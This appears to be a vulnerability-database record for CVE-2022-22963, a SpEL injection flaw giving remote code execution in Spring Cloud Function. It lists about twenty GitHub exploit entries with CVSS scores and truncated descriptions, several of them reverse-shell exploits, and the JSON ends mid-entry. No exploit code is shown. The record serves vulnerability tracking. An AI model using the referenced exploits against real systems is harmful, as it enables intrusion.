In Spring Cloud Function versions 3.1.6, 3.2.2 and older, unsupported versions, when the routing functionality is in use it is possible for a user to supply a specially crafted SpEL expression as the routing-expression, which may result in remote code execution and access to local resources.
{"githubexploit": [{"lastseen": "2023-07-21T18:46:03", "description": "# CVE-2022-22963 Exploit\n\n## Description\n\n\nIn Spring Cloud Funct...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T21:39:20", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-24T18:08:12", "id": "61FC770E-836A-5901-B2CF-CE7181FEBED9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-19T08:44:29", "description": "# Spring Core RCE\nA Proof-of-Concept (**PoC**) of the **Spring C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2022-03-31T14:29:24", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-07-18T13:48:00", "id": "19D93D49-F907-5A3B-9FA2-ED9EFE3A45E0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:43:33", "description": "## CVE-2022-22963: Spring4Shell RCE Exploit\n\nThis is a python im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-13T13:28:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-07T22:25:02", "id": "D1A30248-63E3-5F72-9EDD-1779A6F23FA7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:44:54", "description": "# SpringCloudFunction-Research\nCVE-2022-22963 research\n\n# \u74b0\u5883\n* v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-05T17:06:55", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-07T10:59:37", "id": "2EBB728F-8FCC-57DB-8AC5-50BB5C51500E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:40:50", "description": "# CVE-2022-22963-Reverse-Shell-Exploit\nThis is a Python script t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": 
"LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T06:14:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-21T06:16:01", "id": "5C2C6487-F3F5-580A-9A8C-34ABC1C16EB7", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:19:30", "description": "# Exploit-for-CVE-2022-22963\n\nExploit using curl to get a revers...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-06-29T04:04:50", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 
"userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-06-29T22:10:45", "id": "7D874F81-FBEE-512F-B206-D7CED2BA80B0", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-30T12:05:15", "description": "# CVE-2022-22963\n\nRemote Code Execution exploiting CVE-2022-2296...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-03T16:45:06", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-03T17:19:31", "id": "E00EE482-CF1E-5781-9A57-928FFA18D762", "href": "", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-27T16:46:11", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-21T22:10:16", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-09-27T23:19:20", "id": "4F0237BC-ABC7-5137-BF74-6CA614369115", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-24T23:02:58", "description": "# CVE-2022-22963\nCVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_\u6f0f...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2022-03-30T11:36:42", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-05-05T16:12:06", "id": "D71757FD-E7A3-525B-8B2B-FB1D6DC37D11", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-03-21T05:54:57", "description": "# CVE-2022-22963-Reverse-Shell-Exploit\nThis is a Python script t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-21T05:11:50", "type": "githubexploit", "title": "Exploit for Code Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-03-21T05:49:33", "id": "7191AA24-D888-57E0-8B35-41D35E255E6F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:42:14", "description": "# Spring Cloud Function SPEL\u8868\u8fbe\u5f0f\u6ce8\u5165\u6f0f\u6d1e\uff08CVE-2022-22963\uff09\r\n\r\n>Spring\u6846\u67b6...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-14T11:10:50", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-06-30T08:04:06", "id": "3389F104-810F-5B22-8F78-C961A94A8C27", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T23:36:42", "description": "# Spring Cloud Function Vulnerability (CVE-2022-22963) RCE\nThis ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-04-17T13:54:06", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-04-27T00:44:37", "id": "FE14C1D9-37CA-5446-B354-C8299FC7FAAC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:49:50", "description": "# CVE-2022-22963 RCE PoC\n\nMinimal example to reproduce CVE-2022-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T17:37:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-02-15T10:03:43", "id": "723B41AF-E5A8-5571-BA74-FA8924B88606", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:47:23", "description": "# Spring Cloud Function Vulnerability(CVE-2022-22963)\n\nVulnerabl...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T14:32:14", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-02T23:57:17", "id": 
"BD7F2851-5090-5010-8C27-4B3CCF48ADE1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-28T13:53:07", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T05:04:24", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-09-28T11:37:30", "id": "82AB8274-DF0B-58B4-8C3C-3CE19E21A0C3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:48:05", "description": "# Spring Core RCE - CVE-2022-22963\n\n> Following Spring Cloud, on...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-30T19:07:35", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-04-18T13:31:19", "id": "3D40E0AE-D155-5852-986D-A5FF3880E230", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:48:00", "description": "# CVE-2022-22963\nCVE-2022-22963 PoC \n\nSlight modified for Englis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T11:14:46", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": 
"PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-03-31T11:22:08", "id": "AD1045B7-6DFA-557C-81B2-18F96F0F68A2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-07-21T19:46:09", "description": "# Spring Cloud Function SpEL - cve-2022-22963\n## Build\n```bash\n$...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-03T06:45:51", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-03T07:36:26", "id": "8D79D09C-1FB6-5C99-89C0-D839A4817791", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-05T15:16:05", "description": "# CVE-2022-22963\nTo run the vulnerable SpringBoot application ru...", "cvss3": {}, 
"published": "2022-03-30T15:49:32", "type": "githubexploit", "title": "Exploit for CVE-2022-22963", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-22963"], "modified": "2022-04-05T08:56:16", "id": "F340F3AE-7288-5EF0-85A3-DAB6576064D5", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2023-07-31T11:53:07", "description": "# CVE-2022-22963 Reverse Shell Exploit\n\nThis is a Python script ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-03-18T11:43:00", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Vmware Spring Cloud Function", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22963"], "modified": "2023-07-31T09:03:43", "id": "7899779A-3EFB-5F5A-A490-9D1DEB77503A", "href": "", "cvss": 